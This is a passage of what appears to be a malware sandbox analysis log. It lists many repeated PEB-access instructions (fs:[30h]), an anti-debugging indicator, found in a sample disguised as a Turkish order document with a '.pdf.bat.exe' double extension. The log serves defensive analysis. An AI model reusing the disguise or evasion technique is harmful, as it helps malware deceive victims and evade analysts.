            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6D1D0 mov ecx, dword ptr fs:[00000030h]4_2_32D6D1D0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF61C3 mov eax, dword ptr fs:[00000030h]4_2_32DF61C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF61C3 mov eax, dword ptr fs:[00000030h]4_2_32DF61C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E051CB mov eax, dword ptr fs:[00000030h]4_2_32E051CB
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D601F8 mov eax, dword ptr fs:[00000030h]4_2_32D601F8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h]4_2_32D551EF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D351ED mov eax, dword ptr fs:[00000030h]4_2_32D351ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h]4_2_32DB019F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h]4_2_32DB019F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h]4_2_32DB019F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h]4_2_32DB019F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A197 mov eax, dword ptr fs:[00000030h]4_2_32D2A197
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A197 mov eax, dword ptr fs:[00000030h]4_2_32D2A197
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2A197 mov eax, dword ptr fs:[00000030h]4_2_32D2A197
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D70185 mov eax, dword ptr fs:[00000030h]4_2_32D70185
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEC188 mov eax, dword ptr fs:[00000030h]4_2_32DEC188
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEC188 mov eax, dword ptr fs:[00000030h]4_2_32DEC188
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4B1B0 mov eax, dword ptr fs:[00000030h]4_2_32D4B1B0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h]4_2_32DE11A4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h]4_2_32DE11A4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h]4_2_32DE11A4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h]4_2_32DE11A4
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D37152 mov eax, dword ptr fs:[00000030h]4_2_32D37152
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2C156 mov eax, dword ptr fs:[00000030h]4_2_32D2C156
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D36154 mov eax, dword ptr fs:[00000030h]4_2_32D36154
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D36154 mov eax, dword ptr fs:[00000030h]4_2_32D36154
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov ecx, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h]4_2_32DC4144
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h]4_2_32D29148
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h]4_2_32D29148
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h]4_2_32D29148
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h]4_2_32D29148
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h]4_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC9179 mov eax, dword ptr fs:[00000030h]4_2_32DC9179
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E05152 mov eax, dword ptr fs:[00000030h]4_2_32E05152
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDA118 mov ecx, dword ptr fs:[00000030h]4_2_32DDA118
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDA118 mov eax, dword ptr fs:[00000030h]4_2_32DDA118
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDA118 mov eax, dword ptr fs:[00000030h]4_2_32DDA118
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDA118 mov eax, dword ptr fs:[00000030h]4_2_32DDA118
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF0115 mov eax, dword ptr fs:[00000030h]4_2_32DF0115
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D31131 mov eax, dword ptr fs:[00000030h]4_2_32D31131
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D31131 mov eax, dword ptr fs:[00000030h]4_2_32D31131
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h]4_2_32D2B136
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h]4_2_32D2B136
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h]4_2_32D2B136
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h]4_2_32D2B136
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D60124 mov eax, dword ptr fs:[00000030h]4_2_32D60124
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6A6C7 mov ebx, dword ptr fs:[00000030h]4_2_32D6A6C7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6A6C7 mov eax, dword ptr fs:[00000030h]4_2_32D6A6C7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h]4_2_32D3B6C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h]4_2_32DF16CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h]4_2_32DF16CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h]4_2_32DF16CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h]4_2_32DF16CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEF6C7 mov eax, dword ptr fs:[00000030h]4_2_32DEF6C7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D616CF mov eax, dword ptr fs:[00000030h]4_2_32D616CF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h]4_2_32DAE6F2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h]4_2_32DAE6F2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h]4_2_32DAE6F2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h]4_2_32DAE6F2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB06F1 mov eax, dword ptr fs:[00000030h]4_2_32DB06F1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB06F1 mov eax, dword ptr fs:[00000030h]4_2_32DB06F1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DED6F0 mov eax, dword ptr fs:[00000030h]4_2_32DED6F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h]4_2_32DC36EE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D6E0 mov eax, dword ptr fs:[00000030h]4_2_32D5D6E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D6E0 mov eax, dword ptr fs:[00000030h]4_2_32D5D6E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D34690 mov eax, dword ptr fs:[00000030h]4_2_32D34690
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D34690 mov eax, dword ptr fs:[00000030h]4_2_32D34690
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h]4_2_32DB368C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h]4_2_32DB368C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h]4_2_32DB368C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h]4_2_32DB368C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D276B2 mov eax, dword ptr fs:[00000030h]4_2_32D276B2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D276B2 mov eax, dword ptr fs:[00000030h]4_2_32D276B2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D276B2 mov eax, dword ptr fs:[00000030h]4_2_32D276B2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D666B0 mov eax, dword ptr fs:[00000030h]4_2_32D666B0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6C6A6 mov eax, dword ptr fs:[00000030h]4_2_32D6C6A6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2D6AA mov eax, dword ptr fs:[00000030h]4_2_32D2D6AA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2D6AA mov eax, dword ptr fs:[00000030h]4_2_32D2D6AA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4C640 mov eax, dword ptr fs:[00000030h]4_2_32D4C640
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D62674 mov eax, dword ptr fs:[00000030h]4_2_32D62674
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF866E mov eax, dword ptr fs:[00000030h]4_2_32DF866E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF866E mov eax, dword ptr fs:[00000030h]4_2_32DF866E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6A660 mov eax, dword ptr fs:[00000030h]4_2_32D6A660
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6A660 mov eax, dword ptr fs:[00000030h]4_2_32D6A660
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D69660 mov eax, dword ptr fs:[00000030h]4_2_32D69660
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D69660 mov eax, dword ptr fs:[00000030h]4_2_32D69660
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D33616 mov eax, dword ptr fs:[00000030h]4_2_32D33616
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D33616 mov eax, dword ptr fs:[00000030h]4_2_32D33616
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72619 mov eax, dword ptr fs:[00000030h]4_2_32D72619
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D61607 mov eax, dword ptr fs:[00000030h]4_2_32D61607
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAE609 mov eax, dword ptr fs:[00000030h]4_2_32DAE609
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6F603 mov eax, dword ptr fs:[00000030h]4_2_32D6F603
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E05636 mov eax, dword ptr fs:[00000030h]4_2_32E05636
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]4_2_32D4260B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]4_2_32D4260B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]4_2_32D4260B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]4_2_32D4260B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]4_2_32D4260B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]4_2_32D4260B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h]4_2_32D4260B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E627 mov eax, dword ptr fs:[00000030h]4_2_32D4E627
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]4_2_32D2F626
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]4_2_32D2F626
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]4_2_32D2F626
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]4_2_32D2F626
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]4_2_32D2F626
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]4_2_32D2F626
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]4_2_32D2F626
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]4_2_32D2F626
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h]4_2_32D2F626
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D66620 mov eax, dword ptr fs:[00000030h]4_2_32D66620
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D68620 mov eax, dword ptr fs:[00000030h]4_2_32D68620
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3262C mov eax, dword ptr fs:[00000030h]4_2_32D3262C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3C7C0 mov eax, dword ptr fs:[00000030h]4_2_32D3C7C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D357C0 mov eax, dword ptr fs:[00000030h]4_2_32D357C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D357C0 mov eax, dword ptr fs:[00000030h]4_2_32D357C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D357C0 mov eax, dword ptr fs:[00000030h]4_2_32D357C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D347FB mov eax, dword ptr fs:[00000030h]4_2_32D347FB
